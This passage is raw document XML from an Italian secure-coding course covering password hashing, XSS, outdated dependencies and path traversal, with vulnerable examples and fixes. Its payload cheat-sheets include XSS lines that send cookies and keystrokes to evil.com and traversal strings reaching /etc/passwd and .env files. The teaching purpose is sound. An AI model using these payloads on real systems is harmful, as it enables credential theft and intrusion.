        <w:t xml:space="preserve"># SHA-256 senza salt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base64.b64encode(password.encode())               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Base64 (encoding!)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encrypt(password, secret_key)                      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cifratura reversibile</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37" w:name="test-rapido-lab"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test rapido (lab)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il DB con DB Browser → tabella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→ colonna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 vedi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Diagnosi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mariopwd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(chiaro)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">🔥 Catastrofico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5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(32 hex)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MD5 / morto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5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(40 hex)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SHA-1 / morto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e3b0c44298fc1c149afbf4c8996fb924...</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(64 hex)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SHA-256, ma senza salt è ancora vulnerabile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$2b$12$KIXbN...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bcrypt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$argon2id$v=19$m=65536...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Argon2id ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="come-correggere-bcrypt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come correggere — bcrypt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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Hashare una nuova password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bcrypt.hashpw(password.encode(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Verificare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password_hash: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password_hash)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Uso</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_db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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"segretissima"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salva hash_db nel DB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verify_password(input_pwd, user.password_hash):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ok</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="come-correggere-argon2id-più-moderno"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come correggere — Argon2id (più moderno)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argon2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PasswordHasher</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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PasswordHasher()    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># default sicuri</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Hashare</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_db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"segretissima"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restituisce stringa</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verificare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ph.verify(hash_db, input_pwd)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ok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argon2.exceptions.VerifyMismatchError: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password sbagliata</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="errore-comune-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errore comune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MD5 con salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: comunque inadeguato, MD5 è troppo veloce.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SHA-256 con salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: meglio di niente ma inadeguato per password (troppo veloce per hardware moderno).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Iterare SHA-256 N volte (PBKDF2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: accettabile, ma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt e Argon2id sono migliori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Hash globale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(stesso salt per tutti): inutile, attacco rainbow table batch.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="difese-stratificate-2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08"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ bcrypt o Argon2id —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">mai SHA per password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✅ Salt automatico (le librerie lo generano).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Work factor calibrato (~250ms per hash su hardware target).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Politiche password (minlength 12, no top-100 leaked, anti-brute force).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ MFA su account critici.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Rehash on login (se hai migrato da SHA1/MD5 a bcrypt: la prima volta che l’utente entra, rehash con bcrypt e aggiorna).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">### 4.4 Cross-Site Scripting (XSS) (M6.5 — 1,5h)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A03 Injection (in alcune edizioni A07)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CWE-79</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Art. 32 (può portare a info disclosure)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="come-la-identifichi-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come la identifichi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 🚩 Output HTML senza escape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"/cerca"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cerca():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f"&lt;p&gt;Risultati per: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XSS riflessa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- 🚩 Jinja2 con |safe su input utente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commento | safe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XSS stored --&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="cheat-sheet-di-payload"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cheat-sheet di payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- Test base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Eventi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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> onerror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alert(1)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onload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alert(1)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onload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alert(1)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Bypass filtri ingenui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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Other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ipt&gt;alert(1)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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script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ipt&gt;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//evil.com/x.js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Furto cookie (XSS reale, da capire)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'https://evil.com/log?c='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Stored XSS che keylogga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'https://evil.com/k?='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DOM-based (manipolazione DOM lato client)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"javascript:alert(1)"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43"/>
    <w:bookmarkStart w:id="44" w:name="come-correggerla-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come correggerla</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ Flask + Jinja2 fa escape di default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"/cerca"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cerca():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"cerca.html"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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q)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- ✅ template.html: escape automatico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Risultati per: {{ query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NON usare |safe su input utente --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- ✅ Per HTML "trusted" da utente: bleach/markdown sanitization --&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="difese-stratificate-3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Escape dell’output</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Jinja2 fa per te per default — non disabilitarlo).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CSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">restrittiva (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">script-src 'self'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✅ Cookie con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(XSS non può rubare il session token).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Sanitizzazione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se l’utente può inviare HTML voluto (markdown, WYSIWYG): usa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bleach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con whitelist tag.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✅ Validation della query string (whitelist caratteri).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">### 4.5 Vulnerable Components / Supply Chain (M6.6 — 0,5h)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A06 Vulnerable &amp; Outdated Components</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CWE-1104</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Art. 32 — patching tempestivo</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="come-la-identifichi-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come la identifichi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 🚩 requirements.txt con versioni vecchie</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">flask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=2.0.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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=2.20.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pyyaml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=5.1</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="lab-pip-audit-preparalo-prima"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab pip-audit (preparalo prima)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Installazione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pip-audit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Scan</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Output esempio:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#   Found 3 known vulnerabilities in 2 packages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#   Name      Version  ID                  Fix Versions</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#   ----     -------  ------------------  ------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#   flask    2.0.0    GHSA-m2qf-hxjv-5gpq 2.2.5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#   pyyaml   5.1      GHSA-6757-jp84-gxfx 5.4</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="come-correggerla-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come correggerla</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. Aggiorna le versioni vulnerabili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flask pyyaml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. Aggiorna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Riesegui pip-audit per confermare</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="difese-stratificate-4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in CI/CD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Dependabot/Renovate (PR automatiche di update).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ SBOM aggiornato (CycloneDX, SPDX).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Pinning versioni (mai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask&gt;=2.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sempre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask==2.3.3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✅ Dependency review (conoscere cosa importi).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Scelta libraries con manutenzione attiva (commit recenti, GitHub stars, security policy).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">### 4.6 Path Traversal (M6.7 — 1h)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: A01 Broken Access Control (variante)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CWE-22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Art. 32</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="come-la-identifichi-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come la identifichi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 🚩 Concatenazione naive di filename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send_file(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"./uploads/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1" w:name="cheat-sheet-di-payload-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cheat-sheet di payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../../../../../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">....//....//etc/passwd          # bypass filtro ../ ingenuo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..%2f..%2fetc%2fpasswd          # URL-encoded</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..\windows\system32\drivers\etc\hosts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..\..\Windows\win.ini</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Stessa app</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../app.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../config.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../.env</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Da Linux a Windows (backslash interpretato in Linux come letterale)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..\\etc\\passwd</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkStart w:id="52" w:name="come-correggerla-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come correggerla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abort, send_from_directory</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">UPLOAD_DIR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os.path.realpath(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"./uploads"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ALLOWED_EXTS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Validazione: niente separatori, no nascosti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filename.startswith(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Whitelist estensione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ALLOWED_EXTS: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Risoluzione path + check dentro UPLOAD_DIR</w:t>
      </w:r>
      <w:r>
